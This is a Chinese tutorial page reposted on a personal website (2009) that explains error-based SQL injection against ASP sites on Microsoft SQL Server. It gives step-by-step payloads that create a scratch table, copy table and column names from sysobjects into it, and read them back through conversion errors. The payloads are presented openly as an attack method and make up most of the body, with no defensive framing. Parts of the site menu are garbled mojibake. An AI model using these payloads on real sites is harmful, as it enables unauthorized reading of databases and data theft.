网站首页  注册会员  本站免费电影 留言板  繁體中文

 

您现在的位置: 陈鹏个人网站 >> 电脑应用 >> 网络应用 >> 网络安全 >> 正文
 

|
闂傚倸鍊搁崐鎼佸磹閻戣姤鍊块柨鏇楀亾妞ゎ亜鍟村畷褰掝敋閸涱垰鏁搁梻渚€鈧偛鑻晶鎵磼鏉堛劌娴鐐存崌楠炴帒鈹戦崼婵囧€梺璇叉唉椤煤濡厧鍨濋柟鎹愵嚙缁犲湱鎲搁悧鍫濅刊闁轰礁鍟撮弻銊モ攽閸℃ê娅f繝纰樺墲婵炲﹤顫忕紒妯诲闁告稑锕ラ崕鎾绘⒑閸濄儱娅忛柛瀣工閻g兘骞囬妯规睏闂佸湱鍎ら崹鑸垫綇閸儲顥婃い鎰╁灪婢跺嫰鏌熸搴㈠殌闁宠棄顦垫慨鈧柍鈺佸暞閻濇娊姊绘担铏广€婇柛鎾寸箞閹兘濡烽埡浣哄幈閻庡厜鍋撻柛鏇ㄥ厴閹锋椽姊婚崒姘卞缂佸甯¢弫宥夊籍閸喓鍘甸梺鍛婂灟閸婃牜鈧熬鎷�
|
缂傚倸鍊搁崐鎼佸磹閻戣姤鍤勯柛顐f礃閹偤骞栧ǎ顒€濡奸柣顓燁殜楠炴牕菐椤掆偓婵¤偐绱掗埀顒勫磼濞戞氨顔曢梺鐟邦嚟閸婃垵顫濈捄鍝勫殤闁瑰吋鐣崝宥夋偂韫囨稓鍙撻柛銉亽閸儱纾婚柟鎯х-閺嗭箓鏌涢妷銏℃珖鐎规挷绶氬濠氬磼濞嗘埈妲梺姹囧€曞ú銈夈€呮總绋课╅柍鍝勫€稿▓鎴︽⒑閸撴彃浜濇繛鍙夌墵瀹曞綊宕掗悙瀵稿弳闂佺粯娲栭崐鍦偓姘炬嫹
|
濠电姷鏁告慨鐑藉极閹间礁纾绘繛鎴欏灪閸嬨倝鏌曟繛褍鎳庨弳妤呮⒑缁嬭法鐏遍柛瀣〒缁牓宕橀鐣屽帗闂佸憡绻傜€氼剟鍩€椤掍焦鍊愮€规洘绮撻、妤呭礋椤戣姤瀚奸梺鑽ゅТ濞测晝浜稿▎鎾崇闁革富鍘剧壕濂告煠绾板崬澧伴悽顖涚〒缁辨帡寮崒姘亪閻庤娲栭妶鍛婁繆閻戣棄唯鐟滃繐鐣烽崼鏇熲拻濞达綀濮ょ涵鍫曟煕閿濆繒鐣垫鐐茬箻閺佹捇鏁撻敓锟�
|
闂傚倸鍊搁崐椋庣矆娓氣偓楠炴牠顢曚綅閸ヮ剚鐒肩€广儱鎳愰敍鐔兼⒑閸︻厼顣兼繝銏★耿瀹曞綊宕掑☉鏍︾盎闂佸搫绉查崝宀勬倿瑜版帗鐓涢悗锝庝邯閸欏嫰鏌$仦鐐缂佺姵绋掔换婵嬪礃閵婏妇褰撮梻鍌欒兌鏋い鎴濇楠炴劙骞栨担鍝ュ弨婵犮垼娉涢敃锕傚汲閿曞倹鐓曢柕澶堝灪濞呭棙绻涢崼鐔搞仢婵﹨娅i幏鐘诲箵閹烘繂濡烽梻浣虹帛濡繘宕滈悢鑲╁祦闊洦绋掗弲鎼佹煥閻曞倹瀚�
|
缂傚倸鍊搁崐鎼佸磹閹间礁纾归柟闂寸绾惧綊鏌熼梻瀵割槮闁汇値鍠楅妵鍕冀椤愵澀绮堕梺鎼炲妼閸婂潡寮诲☉銏℃櫆閻犲洦褰冪粻褰掓⒑閹肩偛濡界紒璇茬墦瀵濡堕崶鈺冪厯闁荤姵浜介崝瀣垝閻㈠憡鈷戠紒瀣閹癸綁鏌涢悩宕囧⒌鐎殿喖顭烽弫鎾绘偐閼碱剦妲伴梻渚€娼ф灙闁稿寒鍣e畷鎴﹀箻楠炲じ姹楅梺鍦劋閸ㄨ埖娼忛崼銉︹拺閻犳亽鍔屽▍鎰版煙閸戙倖瀚�
|
IT闂傚倸鍊搁崐鎼佸磹妞嬪海鐭嗗〒姘e亾妤犵偞鐗犻、鏇㈡晝閳ь剛澹曡ぐ鎺撶厽闁硅揪绲鹃ˉ澶岀棯椤撴稑浜鹃梻鍌欑閹诧繝宕濋弴鐐嶇喐绻濋崒妯峰亾閹烘挾绡€婵﹩鍘鹃崣鍡涙⒑缂佹ɑ绀€闁稿﹤婀遍埀顒佺啲閹凤拷
|
闂傚倸鍊搁崐椋庣矆娴i潻鑰块梺顒€绉撮崒銊ф喐閺冨牆绠栨繛宸簻鎯熼梺闈涱樈閸犳绱炴惔銏㈢瘈闁汇垽娼ф牎闂佺厧缍婄粻鏍ь嚕閸涘﹦鐟归柍褜鍓熷濠氬即閵忕娀鍞跺┑鐘茬仛閸旀牜鐟х紓鍌氬€烽懗鑸靛垔椤撱垹闂柨婵嗩槸閽冪喓鈧箍鍎遍悧婊冾瀶閵娾晜鈷戦柛娑橈攻鐏忎即鏌i悢鍙夋珚闁靛棔绀侀埢搴ㄥ箳閺冨倹婢戞繝鐢靛仦閸ㄥ爼鎮烽敃鈧埢宥夊閵堝棌鎷洪柣鐘充航閸斿苯鈻嶉幇鐗堢厵闁告垯鍊栫€氾拷
|
闂傚倸鍊搁崐鎼佸磹閻戣姤鍊块柨鏇楀亾妞ゎ亜鍟村畷褰掝敋閸涱垰鏁搁梻渚€鈧偛鑻晶鎵磼鏉堛劌娴鐐存崌楠炴帒鈹戦崼婵囧€梺璇叉唉椤煤濡厧鍨濈€光偓閸曨剙浠奸梺缁樺灱濡嫰鎮欐繝鍥ㄧ厓闁告繂瀚弸锔剧磼鏉堫偄鐨虹紒杈ㄦ崌瀹曟帒顫濋钘変壕闁归棿鐒﹂崑瀣叓閸ャ劍鈷愰柛娆忕箻閺岋綁濮€閳惰泛缍婇幆灞轿旈崨顔惧弳闂佺粯娲栭崐鍦偓姘炬嫹
|
闂傚倸鍊搁崐宄懊归崶褏鏆﹂柣銏⑶圭粣妤呮煙閹殿喖顣奸柛瀣剁節閺屾洘寰勯崼婵嗗濠电偞鍨惰彜闁衡偓娴犲鍊甸柨婵嗗暙婵$兘鏌涚€n偅宕岀€规洘甯¢幃娆撳蓟閵夈儲鏆梻鍌欑閹碱偄煤閵娾晛纾婚柣鎰劋閸婂灚銇勯幒鍡椾壕闂佸疇顫夐崹鍧楀箖濞嗘挸鐭楀鑸瞪戦敍渚€姊绘担瑙勫仩闁告柨閰e畷浼村冀瑜滈崵鏇炩攽閻樺磭顣查柡鍛倐閺屻劑鎮ら崒娑橆伓
|
   
专 题 栏 目
 婵犵數濮烽弫鍛婃叏閻戣棄鏋侀柟闂寸绾剧粯绻涢幋鐐垫噧缂佸墎鍋ら弻娑㈠Ψ椤旂厧顫╃紓浣插亾闁割偆鍠撶弧鈧梻鍌氱墛缁嬫帡鏁嶉弮鍫熺厾闁哄娉曟禒銏ゆ婢舵劖鐓ユ繝闈涙閸f椽鎮归幇銊ュ⒉闁靛洤瀚伴崺锟犲礃閵娿儱绠i梻浣筋嚃閸犳盯锝炴径鎰闁告稒娼欐导鐘绘煏婢舵ê鐏g紒鈧繝鍕=闁稿本鐟чˇ锔姐亜閿旇鐏﹂柟顔矫埞鎴犫偓锝庝簽閸欌偓濠电姰鍨奸崺鏍礉閺囩姷涓嶅┑鐘崇閸婂灚绻涢幋鐑嗕痪妞ゅ繐妫楅ˉ姘舵煕閹邦剚鈻曟繛鎾愁煼閺屾洟宕煎┑鍫㈩唺闁诲簼绲婚崑鎰閹烘鏁婇柣锝呮湰閸Q冾渻閵堝棙绌跨紓宥勭閻g兘骞囬悧鍫濅簻闂佹儳绻楅~澶婎熆閹达附鈷掑ù锝呮啞閹牊绻涚仦鍌氬鐎规洑鍗抽獮妯肩磼濡桨绮ч梻浣芥硶閸o箓骞忛敓锟�
相 关 文 章

提升15% MySQL 5.1正式版
微软确认年底发布SQL 20
QQ会员优先体验QQLive 6
MySQL管理工具SQLyog最新
SQL Server 2008将“纸”
全新体验  QQLive 5.0.3
新版QQLive 5开始小范围
QQ直播网页改版 QQLive3
过滤不良信息 QQLive3.3
用QQLeU轻松扩大你的QQ交

 
SQL脚本注入的不常见方法概括           
SQL脚本注入的不常见方法概括
作者:陈鹏 文章来源:eNet 点击数:114 更新时间:2009-9-11 23:28:25
 




 

大家在是否碰到过这样的站点:

  全站文章系统采用FSO静态生成的HTML文件来显示。这样做的好处一来可以减轻服务器负担,提高访问速度。二来也阻止了SQL注入式的攻击。。

  我来说说他们的文章系统原理:全部文章均在数据库存有一个副本。另处根据模板生成一个HTML页面。

  攻击方法:

  查看源文件/看里面是否有通过JS来调用的页面。

  如调用来更新文章的浏览次数。

  我们就可以这样来试一下可否注入:

  http://服务器域名/count.asp?id=1552’

  看一下是否出错。如出错说明有注入漏洞。然后正常攻击。

  在本机建立一下post.htm的文件和log.txt的文本文件(用来记录用,这是一个好习惯)

  post.htm内容:主要是方便输入。

  对于SQLSERVER的服务器可以这样判断:在1552后加一分号,如正常有可能是SQLSERVER

  对于这类数据库可以先建一个表id=1552;create table aaa(aaa char(20));--

  然后插入一条记录:id=1552;insert into aaa values(’test’);--

  再之后枚举出他的数据表名:

  id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype=’u’ and status>0);--

  这是将第一个表名更新到aaa的字段处。


热门推荐 瑞星卡卡6.0震撼上市,绝杀木马 局域网基础知识无线网络故障大集合

  id=1552 and exists(select * from aaa where aaa>5)就会报错,多数情况会将表名直接读出:看:

  Microsoft OLE DB Provider for SQL Server 错误 ’80040e07’

  将 varchar 值 ’vote’ 转换为数据类型为 int 的列时发生语法错误。

  /search.asp,行21

  其中vote就是表名:

  也可以先猜出一个表名,再把(select top 1 name from sysobjects where xtype=’u’ and status>0)的值更新到那个表的一条记录中去。通过网页显示。

  读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>’刚才得到的表名’)。

  id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype=’u’ and status>0 and name<>’vote’);--

  然后id=1552 and exists(select * from aaa where aaa>5)

  读出第二个表,^^^^^^一个个的读出,直到没有为止。

  读字段是这样:

  id=1552;update aaa set aaa=(select top 1 col_name(object_id(’表名’),1));--

  然后id=1552 and exists(select * from aaa where aaa>5)出错,得到字段名

  id=1552;update aaa set aaa=(select top 1 col_name(object_id(’表名’),2));--

  然后id=1552 and exists(select * from aaa where aaa>5)出错,得到字段名

  ……类推

热门推荐 瑞星卡卡6.0震撼上市,绝杀木马 局域网基础知识无线网络故障大集合


【责任编辑 王凡】

文章录入:陈鹏    责任编辑:陈鹏 
  • 上一篇文章:

  • 下一篇文章:
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
     
     
     
     
     

    Copyright © 2007 - 2009 chenpeng123.com All Rights Reserved
    本站所有文章,软件等均来自网络收集,不代表本站观点,仅供学习和研究使用。如有侵犯您的版权,请联系我们,本站将立即删除。
    鲁ICP备07014697号
    你是本站第 位访客
    51La